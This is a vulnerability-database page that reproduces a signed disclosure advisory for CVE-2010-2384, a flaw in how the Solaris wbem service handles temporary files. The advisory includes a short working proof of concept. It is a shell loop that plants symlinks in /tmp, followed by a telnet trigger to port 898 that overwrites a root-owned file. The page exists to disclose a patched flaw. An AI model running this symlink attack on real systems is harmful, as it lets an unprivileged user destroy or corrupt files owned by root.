Vulners
Lucene search
Solaris wbem Unsafe Use Of Temporary Files
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2010-2384 | 13 Jul 201000:00 | – | circl |
 | CVE-2010-2384 | 13 Jul 201022:07 | – | cve |
 | CVE-2010-2384 | 13 Jul 201022:07 | – | cvelist |
 | EUVD-2010-2394 | 7 Oct 202500:30 | – | euvd |
 | CVE-2010-2384 | 13 Jul 201022:30 | – | nvd |
 | Oracle Critical Patch Update Advisory - July 2010 | 13 Jul 201000:00 | – | oracle |
| Security | Oracle Critical Patch Update - July 2010 | 13 Jul 201000:00 | – | oracle |
 | Design/Logic Flaw | 13 Jul 201022:30 | – | prion |
 | Oracle Critical Patch Update Advisory - July 2010 | 15 Jul 201000:00 | – | securityvulns |
| CVE-2010-2384: Solaris wbem unsafe use of temporary files | 20 Jul 201000:00 | – | securityvulns |
10
`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Below is the full disclosure information for CVE-2010-2384. It was
reported to [email protected] on 3 January, 2010 and assigned Sun
bug 6913886.
This vulnerability was addressed by Sun/Oracle in the July 2010 Critical
Patch Update
(http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html).
- ------
When the wbem service is enabled
but hasn't been used before, it will run
/usr/sadm/lib/smc/prereg/SUNWrmui/SUNWrmui_reg.sh which can be exploited
by an unprivileged local user like this:
$ id
uid=101(fstuart) gid=14(sysadmin)
$ cd /tmp
$ x=0
$ while [ "$x" -ne 30000 ] ;do
> ln -s /etc/important /tmp/dummy.$x
> x=$(expr "$x" + 1)
> done
$ ls -dl /etc/important
-rw-r--r-- 1 root root 38 Jan 3 22:43 /etc/important
$ cat /etc/important
This is an important file!
EOF
$ telnet localhost 898
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
^]
telnet> quit
Connection to localhost closed.
$ cat /etc/important
/<\/Scope>/ {
n
i\
<Folder TreeDisplay="false"> \
<Name>SUNWrmui Bootstrap Folder</Name> \
<Description>This a temporary folder to workaround a bug. It
should be deleted during install. But if you do see it in the toolbox
editor, do NOT delete it.</Description> \
<Icon>status_16.gif</Icon> \
<LargeIcon>status_32.gif</LargeIcon> \
</Folder>
}
SUNWrmui_reg.sh also uses /tmp/this_computer.$$ which can also be
exploited.
- ------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQEVAwUBTEUMPmKGA6cQSpZSAQJXogf+PNSJwfSchgycCWHVpqknVm4KKJ1s/m0y
SWmbzxkoTuKR3hrW7cAPbUb2RHU92Ew587/uPIXhpUCaTrYImJUU9EYHoo132ZpL
KNEXQeqzMi2qaxQU6mkQBEA9Qc3VDh0kDcbDPjPJKShqb2k84CBq6ni39vb1zRlY
SVMldGCS5XflnjtINiwzdmnjNCVkMT4wtuFo3f2GhZaNKEOAKr2LVZT1KkYA6fmY
a6E5XFisQPBbVSPhN82ed7v73GTe5o09SDN3bHozV7x2ki4vxjCFau/hGG/NVNVD
NddIRtqVu8uodrI5hyt1gNXtTV9rT40GiAyOA1iuQHM7FmB8SXKI8w==
=8592
-----END PGP SIGNATURE-----
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Jul 2010 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.00186